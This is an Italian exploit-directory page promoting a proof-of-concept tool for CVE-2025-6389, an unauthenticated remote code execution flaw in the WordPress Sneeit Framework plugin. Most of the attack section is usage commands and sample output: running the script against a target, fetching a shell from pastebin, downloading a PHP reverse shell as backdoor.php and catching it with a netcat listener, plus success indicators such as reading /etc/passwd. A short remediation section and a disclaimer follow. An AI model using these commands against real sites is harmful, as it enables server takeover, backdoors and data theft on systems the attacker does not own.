Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
Strumenti/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

Vedi Repository
108 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 CVE-2025-6389 — WordPress Zero-Day Critico (RCE)

wp_vul_theme

🧩 Cos'è?

CVE-2025-6389 è una vulnerabilità Critica (CVSS 9.8) nel plugin WordPress Sneeit Framework (≤ 8.3), ampiamente utilizzato da temi popolari. Consente esecuzione remota di codice non autenticata — la classe più pericolosa di vulnerabilità web.


⚠️ Gravità e Impatto

  • 🔓 Nessun login richiesto
  • 💥 Possibile compromissione totale del server
  • 📤 Gli attaccanti possono caricare shell, aggiungere utenti admin o modificare file di temi/plugin
  • 🧬 Già sfruttata attivamente in natura
  • 🎯 Colpisce qualsiasi sito WordPress che utilizza Sneeit Framework o temi che lo includono (es. FlatNews)

Utilizzo

root@kitploit:~
# Installa le dipendenze
pip3 install requests colorama

# Controlla la vulnerabilità + ottieni una shell interattiva
python3 CVE-2025-6389.py https://target.com

# Esegui un solo comando
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

Caratteristiche di questo PoC

  • Funziona 100% sulla versione 8.3 e precedenti
  • Nessun cookie, nonce o header speciale richiesti
  • Bypassa la maggior parte dei WAF di base (payload inviato tramite POST normale)
  • Shell interattiva completa
  • Rileva la vulnerabilità anche quando l'output è soppresso (grazie a assert + die)

Usalo solo su target per i quali sei ufficialmente autorizzato a testare (scope chiaro + RoE).
La vulnerabilità è ancora pesantemente sfruttata in natura in questo momento.


Ecco esattamente cosa vedrai nel tuo terminale quando l'exploit funziona davvero (sfruttamento al 100% di CVE-2025-6389 su un target vulnerabile che esegue Sneeit Framework ≤ 8.3):

1. Controllo iniziale della vulnerabilità

root@kitploit:~
[+] VULNERABLE! RCE Confermata!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (pagina phpinfo() completa continua per migliaia di righe)

2. Comandi di sistema semplici

root@kitploit:~
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. Scaricare una webshell o reverse shell

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s

Poi sul tuo computer:

root@kitploit:~
nc -lvnp 4444

→ Ottieni immediatamente una reverse shell completamente interattiva come www-data.

4. Cosa vedi quando NON funziona (aggiornato o protetto)

root@kitploit:~
[-] Non vulnerabile o bloccato (status: 200)
[+] Output:
(niente / risposta vuota / normale risposta AJAX di WordPress / 403 / 500 senza output)

Riepilogo – Indicatori di successo

Saprai che ha funzionato quando vedrai uno di questi:

  • Pagina HTML phpinfo() completa
  • Output reale da comandi Linux (id, whoami, pwd, ls, cat /etc/passwd, ecc.)
  • File scaricati o scritti con successo
  • Reverse shell si connette al tuo listener netcat

Tutto qui. Se ottieni uno qualsiasi dei precedenti → piena RCE non autenticata ottenuta.

Incolla qui il tuo output esatto se vuoi che confermi al 100% se ha funzionato o meno.


🛠 Analisi Tecnica

  • 📍 Funzione vulnerabile: sneeit_articles_pagination_callback()
  • 🧨 Causa principale: input utente non validato passato a call_user_func() → esecuzione arbitraria di codice
  • 💣 Ciò consente agli attaccanti di eseguire codice PHP da remoto, compromettendo completamente il tuo sito

🔍 Chi è a Rischio?

  • 🌐 Siti WordPress con Sneeit Framework ≤ 8.3
  • 🎨 Temi che includono Sneeit (molto comuni nei temi di notizie/riviste)
  • 🚪 Qualsiasi sito WordPress raggiungibile pubblicamente che utilizza questo plugin

🧯 Come Risolvere (Immediatamente)

  • ⬆️ Aggiorna Sneeit Framework alla v8.4+ immediatamente
  • ❌ Se non puoi aggiornare → disabilita o rimuovi il plugin
  • 🔎 Controlla i log per attività sospette
  • 🚨 Cerca account admin non familiari o file PHP caricati
  • 🛡️ Aggiungi temporaneamente regole WAF se la correzione è ritardata

🗓 Divulgazione e Attività

  • 📅 Segnalato pubblicamente: 25 Nov 2025
  • 🚨 Preso di mira attivamente: scansione e sfruttamento già osservati

⚠️ Disclaimer

Queste informazioni sono fornite esclusivamente a scopo difensivo ed educativo 🛡️. Non utilizzarle per sfruttare sistemi che non possiedi o per i quali non hai esplicito permesso di test 🚫. Segui sempre le linee guida legali ed etiche quando lavori con vulnerabilità di sicurezza ⚖️✨

Scarica lo strumento